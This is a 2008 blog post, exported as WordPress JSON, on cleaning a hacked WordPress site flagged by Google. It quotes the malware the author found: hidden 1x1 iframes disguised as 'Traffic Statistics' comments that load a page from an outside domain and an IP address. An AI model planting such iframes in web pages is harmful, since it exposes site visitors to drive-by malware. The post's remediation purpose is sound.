{"id":129,"date":"2008-03-06T01:33:04","date_gmt":"2008-03-06T06:33:04","guid":{"rendered":"http:\/\/www.jasonmorrison.net\/content\/2008\/fixing-a-this-site-may-harm-your-computer-warning-part-2-hidden-iframes\/"},"modified":"2008-03-06T20:39:55","modified_gmt":"2008-03-07T01:39:55","slug":"fixing-a-this-site-may-harm-your-computer-warning-part-2-hidden-iframes","status":"publish","type":"post","link":"http:\/\/www.jasonmorrison.net\/content\/2008\/fixing-a-this-site-may-harm-your-computer-warning-part-2-hidden-iframes\/","title":{"rendered":"Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames"},"content":{"rendered":"

Earlier I wrote about what I did when my WordPress blog started returning a “This site may harm your computer” warning<\/a> in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:<\/p>\n

    \n
  1. Plug the hole<\/strong> – update WordPress (or your blog, forum, or CMS software) to plug any security holes.<\/li>\n
  2. Repair the damage<\/strong> – search for spammy outgoing links or malware files on your pages and delete them.<\/li>\n
  3. Clear your good name<\/strong> – request a review by StopBadware.org and in Google Webmaster Tools.<\/li>\n<\/ol>\n

    This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.<\/p>\n

    The other tactic they used on my site was inserting invisible iFrames<\/strong>. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:<\/p>\n


    \n<!-- Traffic Statistics --> <iframe src=http:\/\/www.wp-stats-php.info\/iframe\/wp-stats.php width=1 height=1 frameborder=0><\/iframe> <!-- End Traffic Statistics --><\/code><\/p>\n

    <noscript><\/noscript> <iframe src=”http:\/\/61.132.75.71\/iframe\/wp-stats.php” frameborder=”0″ height=”1″ width=”1″><\/iframe><br \/>
    \n<!– End Traffic Statistics –><\/p><\/blockquote>\n

    It looks like others have run into the same issue<\/a>. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.<\/p>\n

    Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):<\/p>\n

    \"webmaster-tools-subdir\"<\/a><\/p>\n

    In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net\/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.<\/p>\n

    One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.<\/p>\n

    Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.<\/p>\n","protected":false},"excerpt":{"rendered":"

    Earlier I wrote about what I did when my WordPress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem: Plug the hole – update WordPress (or your blog, forum, or CMS software) to plug any […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[19],"tags":[759,20,80,234,88,233,220,221,232,46,110],"class_list":["post-129","post","type-post","status-publish","format-standard","hentry","category-blog","tag-blog","tag-firefox","tag-google","tag-google-webmaster-tools","tag-how-to","tag-iframe","tag-spam","tag-spyware","tag-virus","tag-web-development","tag-wordpress"],"aioseo_notices":[],"_links":{"self":[{"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/posts\/129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/comments?post=129"}],"version-history":[{"count":0,"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/posts\/129\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/media?parent=129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/categories?post=129"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.jasonmorrison.net\/content\/wp-json\/wp\/v2\/tags?post=129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}